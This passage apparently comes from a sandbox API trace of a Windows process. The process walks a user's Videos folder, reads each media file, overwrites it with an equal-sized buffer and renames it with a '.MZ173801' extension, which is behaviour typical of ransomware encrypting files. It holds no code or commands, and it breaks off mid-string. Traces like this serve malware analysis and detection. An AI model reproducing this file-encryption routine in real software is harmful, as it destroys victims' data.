GetCurrentThreadId () returned 0x1358 [0120.927] GetCurrentThreadId () returned 0x1358 [0120.927] GetCurrentThreadId () returned 0x1358 [0120.927] GetCurrentThreadId () returned 0x1358 [0120.927] GetCurrentThreadId () returned 0x1358 [0120.927] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8e8190, ftCreationTime.dwHighDateTime=0x1d5f086, ftLastAccessTime.dwLowDateTime=0x80e6dda0, ftLastAccessTime.dwHighDateTime=0x1d5e56c, ftLastWriteTime.dwLowDateTime=0x80e6dda0, ftLastWriteTime.dwHighDateTime=0x1d5e56c, nFileSizeHigh=0x0, nFileSizeLow=0xb060, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="mmI1-6XkHu4NPFT8JK.avi", cAlternateFileName="MMI1-6~1.AVI")) returned 1 [0120.927] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.927] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.927] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\mmI1-6XkHu4NPFT8JK.avi" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\mmi1-6xkhu4npft8jk.avi"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8e8190, ftCreationTime.dwHighDateTime=0x1d5f086, ftLastAccessTime.dwLowDateTime=0x80e6dda0, ftLastAccessTime.dwHighDateTime=0x1d5e56c, ftLastWriteTime.dwLowDateTime=0x80e6dda0, ftLastWriteTime.dwHighDateTime=0x1d5e56c, nFileSizeHigh=0x0, nFileSizeLow=0xb060)) returned 1 [0120.928] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.928] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242e95c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0120.928] GetCurrentThreadId () returned 0x1358 [0120.928] GetCurrentThreadId () returned 0x1358 [0120.928] GetCurrentThreadId () returned 0x1358 [0120.928] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.929] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242eccc, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0120.929] GetCurrentThreadId () returned 0x1358 [0120.929] GetCurrentThreadId () returned 0x1358 [0120.929] GetCurrentThreadId () returned 0x1358 [0120.929] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\mmI1-6XkHu4NPFT8JK.avi" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\mmi1-6xkhu4npft8jk.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.929] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0120.929] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.929] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0xb060 [0120.929] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.929] ReadFile (in: hFile=0x40c, lpBuffer=0x2439f90, nNumberOfBytesToRead=0xb060, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x2439f90*, lpNumberOfBytesRead=0x19f14c*=0xb060, lpOverlapped=0x0) returned 1 [0120.930] CloseHandle (hObject=0x40c) returned 1 [0120.931] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\mmI1-6XkHu4NPFT8JK.avi" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\mmi1-6xkhu4npft8jk.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.932] WriteFile (in: hFile=0x40c, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xb060, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f158*=0xb060, lpOverlapped=0x0) returned 1 [0120.934] CloseHandle (hObject=0x40c) returned 1 [0120.936] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\mmI1-6XkHu4NPFT8JK.avi" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\mmi1-6xkhu4npft8jk.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\mmI1-6XkHu4NPFT8JK.avi.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\mmi1-6xkhu4npft8jk.avi.mz173801")) returned 1 [0120.936] GetCurrentThreadId () returned 0x1358 [0120.936] GetCurrentThreadId () returned 0x1358 [0120.936] GetCurrentThreadId () returned 0x1358 [0120.936] GetCurrentThreadId () returned 0x1358 [0120.936] GetCurrentThreadId () returned 0x1358 [0120.936] GetCurrentThreadId () returned 0x1358 [0120.937] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd41c8f0, ftCreationTime.dwHighDateTime=0x1d5eef2, ftLastAccessTime.dwLowDateTime=0xf48edd10, ftLastAccessTime.dwHighDateTime=0x1d5ecca, ftLastWriteTime.dwLowDateTime=0xf48edd10, ftLastWriteTime.dwHighDateTime=0x1d5ecca, nFileSizeHigh=0x0, nFileSizeLow=0x7338, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="pP59u8bd0tGYlQsp.flv", cAlternateFileName="PP59U8~1.FLV")) returned 1 [0120.937] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.937] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.937] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\pP59u8bd0tGYlQsp.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\pp59u8bd0tgylqsp.flv"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd41c8f0, ftCreationTime.dwHighDateTime=0x1d5eef2, ftLastAccessTime.dwLowDateTime=0xf48edd10, ftLastAccessTime.dwHighDateTime=0x1d5ecca, ftLastWriteTime.dwLowDateTime=0xf48edd10, ftLastWriteTime.dwHighDateTime=0x1d5ecca, nFileSizeHigh=0x0, nFileSizeLow=0x7338)) returned 1 [0120.937] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.937] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242e95c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0120.937] GetCurrentThreadId () returned 0x1358 [0120.937] GetCurrentThreadId () returned 0x1358 [0120.937] GetCurrentThreadId () returned 0x1358 [0120.938] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.938] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242eccc, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2